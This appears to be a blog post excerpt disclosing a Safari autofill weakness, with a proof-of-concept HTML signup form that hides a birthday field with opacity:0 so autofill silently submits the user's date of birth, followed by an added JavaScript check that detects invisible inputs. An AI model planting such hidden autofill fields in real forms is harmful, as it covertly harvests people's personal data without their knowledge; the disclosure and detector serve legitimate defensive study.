So I quickly came up with an evil idea. Would it be possible to abuse that feature to automatically collect birthdays from users on, say, a signup form?
And yes, it’s possible. Save the following HTML on your disk:
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title> Settings - Profile - brightkite.com </title>
  </head>
  <body>
    <form action="http://localhost/" method="get">
      <label for="fullname">Full name</label>
      <input id="fullname" name="fullname" />
      <input type="submit" />
      <input id="street" name="street" />
      <input id="dob" name="dob" style="opacity:0" />
    </form>
  </body>
</html>
It defines a form with three fields: full name, street and birthday. The birthday field is hidden (it is styled with opacity:0), so the user has no idea that it will be submitted as well. The street field is only there to make it easy to check whether autocompletion is working.
Then open the form in Safari (I tried on Version 4 Public Beta 5528.16), enter your full name in the first field and use the tab key to activate the submit button. If everything worked, you’ll see the street field autofilled as you’d expect. But when you submit, the birthday is submitted as well – if you have it stored in your address book.
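A defensive check for the pattern above, as an added example that is not part of the original post: it flags text-like inputs that are rendered invisibly, such as the `dob` field with `opacity:0`. The function names, the 0.1 opacity threshold and the 2px size threshold are assumptions chosen for illustration.

```javascript
// Added example (not from the original post): flag form inputs that a user
// would normally type into but cannot see, so autofill could populate them
// unnoticed. Style values mirror what getComputedStyle() reports.
const TEXT_LIKE = new Set(["", "text", "email", "tel", "date", "url", "number"]);

// Returns a short reason if the style makes the field invisible, else null.
// Thresholds (0.1 opacity, 2px) are illustrative assumptions.
function invisibleReason(style) {
  if (style.display === "none") return "display:none";
  if (style.visibility === "hidden" || style.visibility === "collapse") {
    return "visibility:" + style.visibility;
  }
  if (parseFloat(style.opacity) < 0.1) return "opacity:" + style.opacity;
  if (parseFloat(style.width) < 2 || parseFloat(style.height) < 2) {
    return "near-zero size";
  }
  return null; // off-screen or covered fields are NOT detected by this check
}

// fields: [{ name, type, style }]  ->  [{ name, reason }]
function findInvisibleInputs(fields) {
  const findings = [];
  for (const f of fields) {
    if (!TEXT_LIKE.has((f.type || "").toLowerCase())) continue;
    const reason = invisibleReason(f.style || {});
    if (reason) findings.push({ name: f.name, reason });
  }
  return findings;
}

// Browser adapter: build the descriptors from a live <form> element.
function describeForm(form) {
  return Array.from(form.querySelectorAll("input")).map((el) => {
    const cs = getComputedStyle(el);
    return { name: el.name, type: el.type, style: {
      display: cs.display, visibility: cs.visibility, opacity: cs.opacity,
      width: cs.width, height: cs.height } };
  });
}

// Constructed sample: the fields of the form above as a browser would report them.
const visible = { display: "inline-block", visibility: "visible", opacity: "1",
                  width: "150px", height: "20px" };
const SAMPLE_FIELDS = [
  { name: "fullname", type: "text", style: visible },
  { name: "", type: "submit", style: visible },
  { name: "street", type: "text", style: visible },
  { name: "dob", type: "text", style: { ...visible, opacity: "0" } },
];

console.log(findInvisibleInputs(SAMPLE_FIELDS));
```

In a browser console, `findInvisibleInputs(describeForm(document.forms[0]))` runs the same check against a live page.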